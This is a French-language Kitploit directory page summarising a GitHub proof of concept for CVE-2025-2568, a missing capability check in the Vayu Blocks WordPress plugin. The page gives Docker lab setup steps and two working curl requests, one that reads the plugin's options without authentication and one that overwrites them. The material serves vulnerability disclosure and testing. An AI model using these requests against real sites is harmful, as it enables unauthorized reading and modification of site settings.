Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC_CVE-2025-2568 — Preuve de concept pour CVE-2025-2568, démontrant un accès et une modification non autorisés des options du plugin WordPress Vayu Blocks via des contrôles de capacités manquants. | Kitploit
Outils/GitHubGitHub/shinigami-777/poc_cve-2025-2568
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubshinigami-777/poc_cve-2025-2568

PoC_CVE-2025-2568

Preuve de concept pour CVE-2025-2568, démontrant un accès et une modification non autorisés des options du plugin WordPress Vayu Blocks via des contrôles de capacités manquants.

Voir le dépôt
8il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC CVE-2025-2568

Aperçu

Le plugin Vayu Blocks – Gutenberg Blocks pour WordPress & WooCommerce est vulnérable à un accès non autorisé et à une modification des données en raison de l'absence de vérifications des capacités sur les fonctions vayu_blocks_get_toggle_switch_values_callback et vayu_blocks_save_toggle_switch_callback dans les versions 1.0.4 à 1.2.1. Cela permet à des attaquants non authentifiés de lire les options du plugin et de mettre à jour toute option dont le nom de clé se termine par _value.

Étapes d'exploitation

Configuration (avec docker)

  1. Clonez le dépôt et suivez les étapes :
    cd vuln-wordpress
    docker-compose up -d
    
  2. Décompressez le plugin Vayu dans le dossier wp-content/plugins.
    cd wp-content/plugins/
    unzip vayu-blocks.1.2.0.zip
    
    Le plugin Vayu-blocks (version 1.2.0) est maintenant installé.

Exploitation :

  1. Utilisez ceci pour lire les options :
    curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
    
  2. Envoyez une requête POST comme celle-ci pour modifier les valeurs des options.
    curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
     -H "Content-Type: application/json" \
     -d '{"key":"container", "value":"new_value"}'
    

Vidéo d'exploitation

wordpressexploit.webm

Télécharger l’outil